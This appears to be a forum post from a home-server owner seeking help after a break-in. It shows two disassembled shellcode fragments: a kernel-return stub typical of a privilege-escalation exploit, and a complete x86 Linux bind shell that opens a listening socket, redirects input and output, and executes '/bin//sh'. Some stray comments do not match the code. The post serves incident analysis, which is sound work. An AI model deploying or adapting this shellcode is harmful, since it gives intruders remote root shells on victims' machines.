seeking help from assembly and security gurus. my linux box was hacked!

hello friends

i run a personal web server that recently suffered an unfortunate break-in / hacking attempt. the server that was broken into is running CentOS 6.3 (old yes i know)

i have already taken the server offline to limit further damage and penetration to my home network.

recently, while attempting to do post-mortem analysis of the attacks which were used i find some shell code.

please forgive me i am ignorant to most technical code (also my english still very bad). my work friend help me to decrypt these shell codes. he says they are assembly but i know very little about assembly language programming so i come here to ask you if these programs look bad to you?

can some assembly guru here please tell me what these codes were used to do to my webserver ? i am pretty sure they broke into root account. and i have unplugged this machine so no more damage can be done.

but still i would like to know HOW they did it, and what the assembly programs exploited. so that i can better protect my server in the future.

thank you all much !!

assembly codes below.

program 1:
------SNIP--------
.data:0x00000000 0f01f8 swapgs

.data:0x00000003 e805000000 call func_0000000d

.data:0x00000008 0f01f8 swapgs

.data:0x0000000b 48 dec eax

.data:0x0000000c cf iret
------SNIP--------


program 2:
------SNIP--------
.data:0x00000000 31c0 xor eax,eax

.data:0x00000002 31db xor ebx,ebx

.data:0x00000004 31c9 xor ecx,ecx

.data:0x00000006 31d2 xor edx,edx

.data:0x00000008 b066 mov al,0x66

.data:0x0000000a b301 mov bl,0x1

.data:0x0000000c 51 push ecx

.data:0x0000000d 6a06 push 0x6
; char* dst = arg[0]
.data:0x0000000f 6a01 push 0x1

.data:0x00000011 6a02 push 0x2

.data:0x00000013 89e1 mov ecx,esp

.data:0x00000015 cd80 int 0x80

.data:0x00000017 89c6 mov esi,eax

.data:0x00000019 b066 mov al,0x66

.data:0x0000001b 31db xor ebx,ebx
; while (c != 0)
.data:0x0000001d b302 mov bl,0x2

.data:0x0000001f 6866686653 push 0x53666866

.data:0x00000024 fec3 inc bl

.data:0x00000026 89e1 mov ecx,esp

.data:0x00000028 6a10 push 0x10

.data:0x0000002a 51 push ecx

.data:0x0000002b 56 push esi

.data:0x0000002c 89e1 mov ecx,esp

.data:0x0000002e cd80 int 0x80

.data:0x00000030 31c9 xor ecx,ecx

.data:0x00000032 b103 mov cl,0x3

.data:0x00000034
.data:0x00000034 loc_00000034:
┏▶ .data:0x00000034 fec9 dec cl

┃ .data:0x00000036 b03f mov al,0x3f

┃ .data:0x00000038 cd80 int 0x80

┗ .data:0x0000003a 75f8 jne loc_00000034

.data:0x0000003c 31c0 xor eax,eax

.data:0x0000003e 52 push edx

.data:0x0000003f 686e2f7368 push 0x68732f6e

.data:0x00000044 682f2f6269 push 0x69622f2f

.data:0x00000049 89e3 mov ebx,esp

.data:0x0000004b 52 push edx

.data:0x0000004c 53 push ebx

.data:0x0000004d 89e1 mov ecx,esp

.data:0x0000004f 52 push edx

.data:0x00000050 89e2 mov edx,esp

.data:0x00000052 b00b mov al,0xb

.data:0x00000054 cd80 int 0x80
------SNIP--------


thank you all and well wishes!